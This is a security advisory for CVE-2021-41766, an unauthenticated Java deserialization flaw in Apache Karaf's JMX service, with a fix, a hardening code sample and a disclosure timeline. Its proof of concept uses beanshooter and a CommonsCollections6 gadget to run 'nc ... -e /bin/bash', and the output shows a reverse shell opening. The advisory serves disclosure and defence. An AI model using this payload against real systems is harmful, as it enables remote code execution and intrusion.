usd-2021-0025 (CVE-2021-41766) | Apache Karaf


Advisory ID: usd-2021-0025
CVE Number: CVE-2021-41766
Product: Apache Karaf
Affected Version: <= 4.3.2
Vulnerability Type: CWE-502: Deserialization of Untrusted Data
Security Risk: High
Vendor URL: https://karaf.apache.org/
Vendor Status: Fixed

Description

Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX).
JMX is a Java RMI-based technology that relies on Java serialized objects for client-server communication.
Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation
used by Apache Karaf is not protected against this kind of attack.

The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the target's
class path. We did not look for available gadget chains within Apache Karaf and are not aware of any existing chains. However,
deserialization of untrusted data always represents a high security risk and should be prevented.

Proof of Concept (PoC)

To verify the vulnerability, obtain a binary distribution of Apache Karaf.
After unpacking, Karaf can be started by executing ./bin/karaf, which drops into an interactive console and starts some
services in the background. One of these services is the JMX service, which by default listens on port 1099.

Before the default implementation of JMX was hardened in 2016, it was vulnerable to pre-authentication deserialization attacks.
CVE-2016-3427 was assigned for this vulnerability, and it can be exploited using tools such as beanshooter.
As the deserialization vulnerability in Karaf is very similar, we can use beanshooter to verify the vulnerability.

The following listing shows a corresponding proof of concept. To make the vulnerability exploitable, we copy a library with
known deserialization gadgets to the classpath before starting Karaf. Afterwards, we use beanshooter to obtain code execution:

Start Karaf:

[user@host apache-karaf-4.3.2]$ cp /tmp/commons-collections-3.1.jar lib/
[user@host apache-karaf-4.3.2]$ ./bin/karaf
__ __ ____
/ //_/____ __________ _/ __/
/ ,< / __ `/ ___/ __ `/ /_
/ /| |/ /_/ / / / /_/ / __/
/_/ |_|__,_/_/ __,_/_/

Apache Karaf (4.3.2)

Hit '<tab>' for a list of available commands
and '[cmd] --help' for help on a specific command.
Hit '<ctrl-d>' or type 'system:shutdown' or 'logout' to shutdown Karaf.

karaf@root()>

Exploit with beanshooter:

[user@host apache-karaf-4.3.2]$ beanshooter --bound-name karaf-root 127.0.0.1 1099 cve-2016-3427 CommonsCollections6 "nc 127.0.0.1 4444 -e /bin/bash"
[+] Creating ysoserial payload...done.
[+] cve-2016-3427 - Sending serialized Object as credential.
[+] An SecurityException during the connection attempt is expected.
[+] Connecting to JMX server...
[-] The following exception was thrown: Expected String[2], got java.util.HashSet

Remote Code Execution:

[user@host ~]$ nc -vlp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:41828.
id
uid=1000(user) gid=1000(user) groups=1000(user)

Fix

To fix the Java deserialization vulnerability, it is recommended to configure an ObjectInputFilter for the JMX service.
This can be done by setting a suitable filter pattern for the jmx.remote.rmi.server.credentials.filter.pattern key in the
environment map that is passed when creating a new JMX connector server instance. A corresponding example can be found
within the current JMX default implementation.
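The following Java snippet is an added example (not Karaf's own code) of how an RMI connector server can be created with the credentials filter in place. The service URL, the port, the HardenedJmxServer class name and the placeholder username and password are assumptions made for illustration; the filter pattern allows only java.lang.String (and therefore String[] credentials) and rejects every other class before it is deserialized.

```java
import java.lang.management.ManagementFactory;
import java.rmi.registry.LocateRegistry;
import java.util.HashMap;
import java.util.Map;
import javax.management.MBeanServer;
import javax.management.remote.JMXAuthenticator;
import javax.management.remote.JMXConnectorServer;
import javax.management.remote.JMXConnectorServerFactory;
import javax.management.remote.JMXPrincipal;
import javax.management.remote.JMXServiceURL;
import javax.security.auth.Subject;

// Hypothetical class name; demonstrates the environment map setting described in the advisory.
public class HardenedJmxServer {

    // Placeholder credentials used only for this example.
    private static final String EXPECTED_USER = "monitor";
    private static final String EXPECTED_PASSWORD = "change-me";

    public static JMXConnectorServer start(int port) throws Exception {
        LocateRegistry.createRegistry(port);
        JMXServiceURL url = new JMXServiceURL(
                "service:jmx:rmi:///jndi/rmi://127.0.0.1:" + port + "/jmxrmi");

        Map<String, Object> env = new HashMap<>();
        // Restrict the classes that may be deserialized as credentials: only java.lang.String
        // (including String[]) is accepted, everything else ("!*") is rejected by the filter.
        // On Java 10+ the key is also available as RMIConnectorServer.CREDENTIALS_FILTER_PATTERN.
        env.put("jmx.remote.rmi.server.credentials.filter.pattern", "java.lang.String;!*");

        // The authenticator is only reached with credentials that passed the filter above.
        env.put(JMXConnectorServer.AUTHENTICATOR, (JMXAuthenticator) credentials -> {
            if (!(credentials instanceof String[]) || ((String[]) credentials).length != 2) {
                throw new SecurityException("Expected String[2] credentials");
            }
            String[] creds = (String[]) credentials;
            if (!EXPECTED_USER.equals(creds[0]) || !EXPECTED_PASSWORD.equals(creds[1])) {
                throw new SecurityException("Invalid credentials");
            }
            Subject subject = new Subject();
            subject.getPrincipals().add(new JMXPrincipal(creds[0]));
            return subject;
        });

        MBeanServer mbs = ManagementFactory.getPlatformMBeanServer();
        JMXConnectorServer server = JMXConnectorServerFactory.newJMXConnectorServer(url, env, mbs);
        server.start();
        return server;
    }
}
```

A quick way to verify the setting is in place is to connect with a standard JMX client using a String[2] credential, which must still succeed, while the server must no longer deserialize arbitrary classes supplied in the credentials field.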

Timeline

  • 2021-08-16: Vulnerability identified by Konstantin Samuel and Tobias Neitzel.
  • 2021-08-25: Advisory sent to security@apache.org.
  • 2021-08-30: Investigation started by vendor.
  • 2021-12-30: Status update requested from vendor.
  • 2022-03-10: Advisory for CVE-2021-41766 is released by Apache.
  • 2022-04-24: Security advisory released by usd AG.

Credits

This security vulnerability was found by Konstantin Samuel and Tobias Neitzel of usd AG.